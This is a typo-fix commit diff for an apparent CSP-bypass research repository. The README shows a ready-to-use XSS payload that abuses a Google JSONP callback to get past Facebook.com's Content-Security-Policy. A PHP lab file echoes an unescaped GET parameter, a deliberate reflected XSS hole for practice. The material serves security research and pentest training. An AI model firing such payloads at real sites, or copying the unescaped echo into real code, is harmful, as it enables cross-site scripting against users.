Fix some typos, spaces.

README.md

@@ -16,12 +16,12 @@ The tool is not yet fully completed as I'm still adding some validations and fea
 
 The repo contains ready-to-use payloads that can bypass CSP for Facebook.com, Google.com and more.
 
-**Bypasing Facebook.com Content-Security policy:**
+**Bypassing Facebook.com Content-Security policy:**
 
 Facebook.com allows *.google.com in its CSP policy (script-src directive), thus, below payload would work like a charm to execute JavaScript on Facebook.com:
 `"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>`
 
 If you came across a website that trusts any of the domains in jsonp.txt file in its script-src directive, then pickup a payload  that matches the domain and have fun :)
 
 # How can you help?
-You are all welcome to contribute by adding links to sites that uses JSONP endpoins/callbacks to make the repo bigger and more usefull for bug hunters, pentesters, and security researchers.
+You are all welcome to contribute by adding links to sites that uses JSONP endpoints/callbacks to make the repo bigger and more useful for bug hunters, pentesters, and security researchers.

csp_lab.php

@@ -1,19 +1,19 @@
 <?php
-//By Ebrahem Hegazy @Zigoo0
-//This file is intended for those who would like to play with CSP. You can modify the CSP policy within the file and try to XSS it.
-//CSP only works in modern browsers Chrome 25+, Firefox 23+, Safari 7+
+// By Ebrahem Hegazy @Zigoo0
+// This file is intended for those who would like to play with CSP. You can modify the CSP policy within the file and try to XSS it.
+// CSP only works in modern browsers Chrome 25+, Firefox 23+, Safari 7+
 $headerCSP = "Content-Security-Policy-Report-Only:".
         "connect-src 'self' ;". // XMLHttpRequest (AJAX request), WebSocket or EventSource.
         "default-src 'self';". // Default policy for loading html elements
-        "frame-ancestors 'self' ;". //allow parent framing - this one blocks click jacking and ui redress
-        "frame-src 'none';". // vaid sources for frames
-        "media-src 'self' *.example.com;". // vaid sources for media (audio and video html tags src)
-        "object-src 'none'; ". // valid object embed and applet tags src
-        "report-uri https://example.com/violationReportForCSP.php;". //A URL that will get raw json data in post that lets you know what was violated and blocked
-        "script-src 'self' *.uber.com *.twitter.com *.google.com code.jquery.com https://ssl.google-analytics.com ;". // allows js from self, jquery and google analytics.  Inline allows inline js
-        "style-src 'self' 'unsafe-inline';";// allows css from self and inline allows inline css
-//Sends the Header in the HTTP response to instruct the Browser how it should handle content and what is whitelisted
-//Its up to the browser to follow the policy which each browser has varying support
+        "frame-ancestors 'self' ;". // Allow parent framing - this one blocks click jacking and ui redress
+        "frame-src 'none';". // Vaild sources for frames
+        "media-src 'self' *.example.com;". // Vaild sources for media (audio and video html tags src)
+        "object-src 'none'; ". // Valid object embed and applet tags src
+        "report-uri https://example.com/violationReportForCSP.php;". // A URL that will get raw json data in post that lets you know what was violated and blocked
+        "script-src 'self' *.uber.com *.twitter.com *.google.com code.jquery.com https://ssl.google-analytics.com ;". // Allows js from self, jquery and google analytics.  Inline allows inline js
+        "style-src 'self' 'unsafe-inline';";// Allows css from self and inline allows inline css
+// Sends the Header in the HTTP response to instruct the Browser how it should handle content and what is whitelisted
+// It's up to the browser to follow the policy which each browser has varying support
 header($headerCSP);
 $xss = $_GET['name'];
 echo "<html>Hello Mr.".$xss;